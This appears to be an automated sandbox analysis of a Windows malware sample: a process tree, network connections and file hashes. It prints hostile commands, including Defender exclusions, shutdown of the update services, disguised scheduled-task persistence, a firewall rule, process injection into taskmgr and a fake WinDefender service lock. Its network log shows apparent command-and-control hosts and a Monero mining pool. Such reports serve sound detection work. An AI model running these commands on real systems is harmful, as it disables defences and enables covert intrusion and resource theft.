C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe

C:\Users\Admin\AppData\Local\Temp\C8EF.bat

"C:\Users\Admin\AppData\Local\Temp\C8EF.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 944 -ip 944

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4528 -ip 4528

C:\Users\Admin\AppData\Local\Temp\CB52.exe

C:\Users\Admin\AppData\Local\Temp\CB52.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4964 -ip 4964

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C9D8.tmp\C9D9.tmp\C9DA.bat C:\Users\Admin\AppData\Local\Temp\C8EF.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 540

C:\Users\Admin\AppData\Local\Temp\CD18.exe

C:\Users\Admin\AppData\Local\Temp\CD18.exe

C:\Users\Admin\AppData\Local\Temp\CF8A.exe

C:\Users\Admin\AppData\Local\Temp\CF8A.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2BY150Kr.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2BY150Kr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5096 -ip 5096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 388

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffccfa446f8,0x7ffccfa44708,0x7ffccfa44718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffccfa446f8,0x7ffccfa44708,0x7ffccfa44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3104 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3052 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9251476182125134879,11998206662106358223,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\C17.exe

C:\Users\Admin\AppData\Local\Temp\C17.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\322E.exe

C:\Users\Admin\AppData\Local\Temp\322E.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\3432.exe

C:\Users\Admin\AppData\Local\Temp\3432.exe

C:\Users\Admin\AppData\Local\Temp\3721.exe

C:\Users\Admin\AppData\Local\Temp\3721.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5900 -ip 5900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 796

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 77.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 tak.soydet.top udp
FI 77.91.124.55:19071 tcp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 162.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 254.21.238.8.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 7d1bbe25-a2ce-4273-a9d6-5e46c5171831.uuid.cdntokiog.studio udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 stun.stunprotocol.org udp
US 8.8.8.8:53 server2.cdntokiog.studio udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
BG 185.82.216.49:443 server2.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 49.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 stun.stunprotocol.org udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 80.190.68.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 130.193.15.51.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
N/A 127.0.0.1:3478 udp
US 8.8.8.8:53 stun.ipfire.org udp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 44.27.3.81.in-addr.arpa udp
N/A 127.0.0.1:3478 udp
N/A 127.0.0.1:3478 udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

MD5 d54e8d7604a377a7365eb2a9938e5bb3
SHA1 4b8b2b99a9686aaafe0573274abd942d39dd9a2b
SHA256 20beb8fbb0bfad1b4e83c8963f8faa13a0ae6c1cc9c2abc88784ed0dd4639be8
SHA512 8bf8aafc8d390d8759b64119921367e8f4a0fae6b88c5d08ba38a6b6eed14bd53c501d412b5afe2b66f9774f7020c3d4d1ca38130f13748314c0ee19cc132884

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe

MD5 d54e8d7604a377a7365eb2a9938e5bb3
SHA1 4b8b2b99a9686aaafe0573274abd942d39dd9a2b
SHA256 20beb8fbb0bfad1b4e83c8963f8faa13a0ae6c1cc9c2abc88784ed0dd4639be8
SHA512 8bf8aafc8d390d8759b64119921367e8f4a0fae6b88c5d08ba38a6b6eed14bd53c501d412b5afe2b66f9774f7020c3d4d1ca38130f13748314c0ee19cc132884

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe

MD5 9609b09ea71e8b93a28952593162aa93
SHA1 e1398b8d3cd91362d17488098858528d348a35e5
SHA256 d5063fedba3cd823ad9a1564da01554e540234f5d79435ef0f752c6029c490d1
SHA512 c688e5b24eb1add31b61fd605eefd67db66ab4bf7a9a77cd1d1d1fec3923459ace509aa22efe60d4a1723d663b52780a2b5737653538dcbc1353b388b6888c80

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe

MD5 9609b09ea71e8b93a28952593162aa93
SHA1 e1398b8d3cd91362d17488098858528d348a35e5
